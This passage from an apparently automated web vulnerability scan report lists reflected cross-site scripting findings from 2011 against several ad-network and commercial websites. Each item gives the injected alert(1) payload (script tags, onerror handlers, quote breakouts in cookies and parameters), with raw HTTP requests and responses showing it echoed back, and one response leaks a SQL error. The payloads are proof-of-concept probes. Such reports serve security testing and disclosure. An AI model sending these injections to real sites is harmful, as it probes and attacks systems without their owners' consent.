FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1; FFad=0; FFcat=1220,175,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,14:1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=130
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:09:54 GMT
Connection: close
Content-Length: 2536

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='';var zzC
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~010411dc04b"-alert(1)-"93a36e51360;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.698. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ba9d"-alert(1)-"5d6a06513d5 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=175&a=0&f=&n=1220&r=13&d=9&q=&$=&s=134&z=0.00999015336856246 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,175,9;expires=Fri, 04 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Thu, 03 Feb 2011 16:12:04 GMT
Date: Thu, 03 Feb 2011 16:10:02 GMT
Connection: close
Content-Length: 2537

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=134;var zzPat='';var zzC
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5';

var zzhasAd=undefined;


               var zzStr = "s=134;u=INmz6woBADYAAHrQ5V4AAACH~0104119ba9d"-alert(1)-"5d6a06513d5;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

4.699. http://da.newstogram.com/hg.php [DMUserTrack cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The value of the DMUserTrack cookie is copied into the HTML document as plain text between tags. The payload 6897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19 was submitted in the DMUserTrack cookie. This input was echoed as 6897e<img src=a onerror=alert(1)>f1b5e532c19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%276897e<img%20src%3da%20onerror%3dalert(1)>f1b5e532c19

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 03 Feb 2011 18:54:27 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%276897e%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef1b5e532c19; expires=Fri, 03-Feb-2012 18:54:27 GMT; domain=.newstogram.com
Content-Length: 167

Newstogram.completed({"Histogram":{"status":"error","uid":"76DB7C80-A3AF-45F2-82C2-8381798839F3'6897e<img src=a onerror=alert(1)>f1b5e532c19","ip":"173.193.214.243"}})

4.700. http://gsbmtg.rtrk.com/ [RlocalUID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /

Issue detail

The value of the RlocalUID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc711"><script>alert(1)</script>103b14f1145 was submitted in the RlocalUID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319dc711"><script>alert(1)</script>103b14f1145; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:19 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D1794967%26cid%3D696829%26tc%3D11020308002595319dc711%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E103b14f1145; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR", policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:11 GMT;path=/;httponly
Content-Length: 2946


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>GSB Mortgage, Inc. (Grapevine,TX)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO
...[SNIP]...
<frame src="/coupon/d544/544003/index5.html?scid=1794967&cid=696829&tc=11020308002595319dc711"><script>alert(1)</script>103b14f1145&rl_key=266706c08d1e97edf1c0c82556f3d3e7&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0

...[SNIP]...

4.701. http://optimized-by.rubiconproject.com/a/6272/9319/15153-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6272/9319/15153-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8010f"-alert(1)-"9cee6b4b2f1 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6272/9319/15153-15.js?cb=0.5483633035328239 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=3;sz=300x250;c1=uncategorized;ord=3300234652124345.5?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1%262119%3D1; ruid=8010f"-alert(1)-"9cee6b4b2f1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6272/9319; rdk2=0; ses2=9319^1; csi2=3191844.js^1^1296750694^1296750694

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:02:22 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6272/9319; expires=Thu, 03-Feb-2011 20:02:22 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Thu, 03-Feb-2011 20:02:22 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9319^1; expires=Fri, 04-Feb-2011 05:59:59 GMT; max-age=46657; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3173810.js^1^1296759742^1296759742; expires=Thu, 10-Feb-2011 19:02:22 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2270

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3173810"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=8010f"-alert(1)-"9cee6b4b2f1\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

4.702. http://optimized-by.rubiconproject.com/a/6272/9319/15153-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6272/9319/15153-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67d78"-alert(1)-"0dfb266372e was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6272/9319/15153-2.js?cb=0.19099231413565576 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=1;dcode=ocr;pcode=sant;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;c1=uncategorized;ord=3300234652124345.5?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=usr3fd748acf5bcab14; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false; ruid=67d78"-alert(1)-"0dfb266372e; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1%262119%3D1

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:02:08 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=67d78"-alert(1)-"0dfb266372e^1^1296759728^2915161843; expires=Wed, 04-May-2011 19:02:08 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=6272/9319; expires=Thu, 03-Feb-2011 20:02:08 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Thu, 03-Feb-2011 20:02:08 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9319^1; expires=Fri, 04-Feb-2011 05:59:59 GMT; max-age=46671; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=719969.js^1^1296759728^1296759728; expires=Thu, 10-Feb-2011 19:02:08 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2611

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "719969" +
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=67d78"-alert(1)-"0dfb266372e\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

4.703. http://porscheusa.com/911GTS-mosaic [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://porscheusa.com
Path:   /911GTS-mosaic

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fc74"><script>alert(1)</script>069d9c26fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2 HTTP/1.1
Host: porscheusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu Feb 3 19:15:05 2011
Server: redirector/2.0 (Unix)
Location: http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Moved Temporarily</TITLE>
</HEAD><BODY>
<H1>Moved Temporarily</H1>
The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic9fc74"><script>alert(1)</script>069d9c26fc2">
...[SNIP]...

4.704. http://porscheusa.com/911GTS-mosaic [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://porscheusa.com
Path:   /911GTS-mosaic

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bed1c"><script>alert(1)</script>60964318e57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1 HTTP/1.1
Host: porscheusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu Feb 3 19:14:56 2011
Server: redirector/2.0 (Unix)
Location: http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Moved Temporarily</TITLE>
</HEAD><BODY>
<H1>Moved Temporarily</H1>
The Document has moved <A HREF="http://www22.us.porsche.com/911GTS-mosaic?bed1c"><script>alert(1)</script>60964318e57=1">
...[SNIP]...

4.705. http://s1.srtk.net/www/delivery/rd.php [trackerid parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s1.srtk.net
Path:   /www/delivery/rd.php

Issue detail

The value of the trackerid request parameter is copied into the HTML document as plain text between tags. The payload 4e88d<script>alert(1)</script>4dbb23bcccc was submitted in the trackerid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /www/delivery/rd.php?bannerid=372&trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc&SR=sr3_43119753_ms&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B232825021%3B56698875%3Bs%3Fhttp%3A%2F%2Fwww.us.hsbc.com%2F1%2F2%2F3%2Fhsbcpremier%2Fprom%2Fnov-10%3Fcode%3DPMD0006263%26WT.srch%3D1%26WT.mc_id%3DHBUS_PMD0006263 HTTP/1.1
Host: s1.srtk.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 16:23:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
P3P: policyref="http://s1.srtk.net/w3c/s1.xml", CP="NON IVAa HISa OTPa OUR DELa IND UNI PUR COM NAV INT"
Set-Cookie: MAXID=22038148057ac3fac5133f97badb01dc; expires=Fri, 03-Feb-2012 16:23:52 GMT; path=/
location: http://ad.doubleclick.net/clk;232825021;56698875;s?http://www.us.hsbc.com/1/2/3/hsbcpremier/prom/nov-10?code=PMD0006263&WT.srch=1&WT.mc_id=HBUS_PMD0006263
Content-Length: 362
Connection: close
Content-Type: application/x-javascript

SELECT v.variableid AS variable_id,v.trackerid AS tracker_id,v.name AS name,v.datatype AS type FROM variables AS v WHERE v.trackerid=9774e88d<script>alert(1)</script>4dbb23bcccc

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd<script>
...[SNIP]...

4.706. http://www.feedzilla.com/rss/flash_feed.asp [Cat2 parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.feedzilla.com
Path:   /rss/flash_feed.asp

Issue detail

The value of the Cat2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c5e4"><script>alert(1)</script>e49c418b94f was submitted in the Cat2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /rss/flash_feed.asp?cat=business&Cat2=mortgage2c5e4"><script>alert(1)</script>e49c418b94f HTTP/1.1
Host: www.feedzilla.com
Proxy-Connection: keep-alive
Referer: http://urlwww--feedzilla--com.rtrk.com/tools/news-widget.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
